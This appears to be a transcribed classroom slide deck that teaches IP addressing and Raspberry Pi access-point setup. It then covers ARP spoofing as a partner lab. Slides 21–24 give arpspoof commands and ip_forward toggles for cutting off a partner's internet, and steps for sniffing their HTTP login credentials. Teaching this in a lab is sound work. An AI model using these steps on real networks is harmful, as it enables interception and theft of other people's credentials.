Presentation is loading. Please wait.

Presentation is loading. Please wait.

Wireless Access Point. What is a WAP?  A Wireless access point (WAP) is a device that allows a wireless device to connect to a wired network.

Similar presentations


Presentation on theme: "Wireless Access Point. What is a WAP?  A Wireless access point (WAP) is a device that allows a wireless device to connect to a wired network."— Presentation transcript:

1 Wireless Access Point

2 What is a WAP?  A Wireless access point (WAP) is a device that allows a wireless device to connect to a wired network.

3 What is a WAP?  SSID = Service Set Identifier = Network Name

4 Why use it? It can help extend your WIFI range!

5 What is the internet? Super Simple Break Down: Inter = Between net = network

6 How does one computer talk to another?  EXERCISE 1 (20 Seconds):  Call someone you know and hang up really quick:  How did you do that?  Contact/Recent History => Actual Phone Number  Every computer on the network has its own phone number  EXERCISE 2  Type this in your browser (chrome, Internet Explorer, Firefox, Edge):  157.166.226.25  173.252.120.68  74.125.226.72  IP Address == Phone Number  Domain Name == Contact Name (336) 555-5555

7 Routers and IP addresses  Routers passes “packets” of information from one router to the next.  Try traceroute packet 74.125.226.72 154.8.31.80 Router

8 What’s your IP?  EXERCISE 3  Google this:  What is my ip?  154.8.31.90  Using Raspberry Pi:  Type ifconfig in the terminal  Using Windows  Type ipconfig in the command prompt How internet sees us: 154.8.31.90 10.54.110.16 10.54.110.151 10.54.110.318 10.54.110.9 10.54.110.56 10.54.110.14 10.54.110. 42 Router (static) 10.54.110.254 LAN (how we see ourselves)

9 How to Set up a Raspberry Pi as a Wireless Access Point  1. Configure the wireless adapter with a static IP address  2. Install and configure a Dynamic Host Configuration Protocol (DHCP) server  3. Install and configure the access point daemon  4. Configure IP routing between the wireless and Ethernet STATIC: 192.168.42.1 192.168.42.20 192.168.42. 37 192.168.42.4 10.54.110.45

10 1. Configure the wireless adapter with a static IP address STATIC: 192.168.42.1 Edit /etc/network/interfaces Used for the majority of network setups  Finished Version: ……  allow hotplug wlan0  iface wlan0 inet static  address 192.168.42.1  netmask 255.255.255.0 ……

11 2. Install and configure a DHCP server  Finished Version: ……  authoritative; ……  subnet 192.168.42.0 netmask 255.255.255.0 {  range 192.168.42.10 192.168.42.50;  option broadcast-address 192.168.42.255;  option routers 192.168.42.1;  default-lease-time 600;  max-lease-time 7200;  option domain-name "local";  option domain-name-servers 8.8.8.8, 8.8.4.4; }} Edit /etc/dhcp/dhcpd.conf Used to set DHCP’s configurations 192.168.42.20 192.168.42. 37 192.168.42.4 STATIC: 192.168.42.1

12 2. Install and configure a DHCP server  Finished Version: ……  INTERFACES="" to INTERFACES="wlan0" …… Edit /etc/default/isc-dhcp-server Internet Systems Consortium (DHCP) Intialization File??? 192.168.42.20 192.168.42. 37 192.168.42.4 STATIC: 192.168.42.1

13 3. Install and configure the access point daemon  Finished Version:  interface=wlan0 ……  ssid=EnterYourSSID ..  wpa_passphrase=MoreThan7Characters  wpa_key_mgmt=WPA-PSK …… Edit /etc/hostapd/hostapd.conf Custom Host Access Point Daemon Configuration File 192.168.42.20 192.168.42. 37 192.168.42.4 STATIC: 192.168.42.1

14 3. Install and configure the access point daemon  Finished Version: ……  DAEMON_CONF="/etc/hostapd/hostapd.co nf” …… Edit /etc/default/hostapd Host Access Point Daemon Initialization script 192.168.42.20 192.168.42. 37 192.168.42.4 STATIC: 192.168.42.1

15 4. Configure IP routing between the wireless and Ethernet  Finished Version:  # Uncomment the next line to enable packet forwarding for IPv4  net.ipv4.ip_forward=1 Edit /etc/sysctl.conf System Control Configuration 192.168.42.4 ip_forward

16 4. Configure IP routing between the wireless and Ethernet  Allow ip forwarding:  sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"  sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT  sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT ip_forward 192.168.42.4 154.8.31.90 192.168.42.4

17 Arp Spoofing/Poisoning

18 Switches and MAC address  Every device in the world has a unique MAC (media access control) address.  Switches move packets based on MACs, from one device to another.  EXERCISE 4  Find your MAC address.  Using Raspberry Pi:  Type ifconfig in the terminal  Using Windows  Type “ipconfig /all” in the command prompt 00:30:6E:F4:E0:7C 00:09:5B:EC:EE:F2 0:3:ba:21:33:33 SWITCH

19 ARP (Address Resolution Protocol) Router 10.54.110.254 10.54.110.214 10.54.110.45 resolve IP ADDRESS MAC ADDRESS Packet 10.54.110.45 00:30:6E:F4:E0:7C 0:3:ba:21:33:33 00:09:5B:EC:EE:F2 Switch 00:30:6E:F4:E0:7C

20 ARP Spoofing/Poisoning VICTIM 10.54.110.214 hacker 10.54.110.45 00:30:6E:F4:E0:7C 00:09:5B:EC:EE:F2 ROUTER 10.54.110.254 00:03:ba:21:33:33 ROUTER’s ARP Table IP AddressMAC Address Hacker 10.54.110.4500:30:6E:F4:E0:7C Victim 10.54.110.21400:09:5B:EC:EE:F2 Victim’s ARP Table IP AddressMAC Address Hacker 10.54.110.4500:30:6E:F4:E0:7C Router 10.54.110.25400:03:ba:21:33:33 ROUTER I’m the victim. 10.54.110.214 is 00:30:6E:F4:E0: 7C Victim I’m the Router. 10.54.110.254 is 00:30:6E:F4:E0:7C Victm’s ARP Table IP AddressMAC Address Hacker 10.54.110.4500:30:6E:F4:E0:7C Router 10.54.110.25400:30:6E:F4:E0:7C ROUTER’s ARP Table IP AddressMAC Address Hacker 10.54.110.4500:30:6E:F4:E0:7C Victim 10.54.110.21400:30:6E:F4:E0:7C

21 Terminal Commands  Find router’s ipaddress  route –n  Trick the router and victim think you're the other device  arpspoof –t partner’sIPaddress –r router’sIPaddress  Block Access  echo 0 > /proc/sys/net/ipv4/ip_forward  Allow Access  echo 1 > /proc/sys/net/ipv4/ip_forward

22 Now you do it, and switch!  EXERCISE 5 (Block your partner’s internet Access)  Open Terminal (allow access)  Type: echo 1 > /proc/sys/net/ipv4/ip_forward  Open Another Terminal  Type: arpspoof –t partner’sIPaddress –r 10.54.110.254  Get partner to surf the web  Block your partner’s internet Access  Type: echo 0 > /proc/sys/net/ipv4/ip_forward

23 Now you do it!  Using Terminal (allow access)  Type: echo 1 > /proc/sys/net/ipv4/ip_forward  ClickIcon  Press “OK” button  Select “eth0” and click “Start”  Filter by typing in “http” and press enter

24 Now you do it!  Partner browse:  http://??.??.??.??/store/login.php http://??.??.??.??/store/login.php  Hacker, look for “POST” or “(application/x-www-form-urlencoded)”  Click it  Click “HTML Form URL Encoded: application/x-www-form-urlencoded”


Download ppt "Wireless Access Point. What is a WAP?  A Wireless access point (WAP) is a device that allows a wireless device to connect to a wired network."

Similar presentations


Ads by Google